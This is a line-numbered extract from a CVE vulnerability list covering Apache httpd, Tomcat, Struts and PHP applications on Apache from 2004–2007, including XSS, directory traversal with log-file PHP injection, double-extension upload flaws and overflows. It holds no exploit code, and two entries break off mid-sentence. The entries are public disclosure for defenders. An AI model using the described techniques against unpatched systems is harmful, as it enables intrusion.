15131| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
15132| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
15133| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
15134| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
15135| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
15136| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
15137| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
15138| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
15139| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
15140| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
15141| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
15142| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
15143| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
15144| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
15145| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
15146| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
15147| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
15148| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
15149| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
15150| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
15151| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
15152| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
15153| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
15154| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
15155| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
15156| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
15157| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
15158| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
15159| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
15160| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
15161| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
15162| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
15163| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
15164| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
15165| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
15166| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
15167| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
15168| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
15169| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
15170| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
15171| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
15172| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
15173| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
15174| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
15175| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
15176| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
15177| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
15178| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
15179| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
15180| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
15181| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
15182| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
15183| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
15184| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
15185| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
15186| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
15187| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
15188| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
15189| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
15190| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
15191| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
15192| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
15193| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
15194| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
15195| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
15196| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
15197| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
15198| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
15199| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
15200| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
15201| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
15202| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
15203| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
15204| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
15205| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
15206| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
15207| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
15208| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
15209| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
15210| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
15211| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
15212| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
15213| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
15214| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
15215| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
15216| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
15217| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
15218| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
15219| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
15220| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
15221| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
15222| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
15223| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
15224| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
15225| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
15226| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
15227| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
15228| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
15229| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
15230| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
15231| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
15232| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
15233| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
15234| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
15235| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
15236| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
15237| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
15238| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
15239| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
15240| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
15241| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
15242| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
15243| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
15244| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
15245| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
15246| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
15247| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
15248| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
